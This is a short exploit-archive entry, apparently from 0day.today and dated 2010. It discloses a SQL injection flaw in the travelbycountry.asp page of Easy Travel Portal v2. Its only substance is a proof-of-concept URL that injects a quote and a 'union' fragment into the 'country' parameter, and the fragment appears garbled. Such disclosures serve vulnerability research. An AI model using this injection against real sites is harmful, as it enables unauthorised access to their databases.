id: 15032
date: 12/04/2010
title: Easy Travel Portal v2 (travelbycountry.asp) SQL Injection Vulnerability
author: CWH Underground
cves: 

=======================================================================
Easy Travel Portal v2 (travelbycountry.asp) SQL Injection Vulnerability
=======================================================================

PRODUCT: Easy Travel Portal v2
PRODUCT URL: http://www.softwebsnepal.com/travel_website_progamming_portal.htm
RESEARCHERS: underground-stockholm.com
RESEARCHERS URL: http://underground-stockholm.com/
 
VULN:
 
http://[host]/[path]/travelbycountry.asp?country=China%27%20union%20insect



#  0day.today [2023-03-23]  #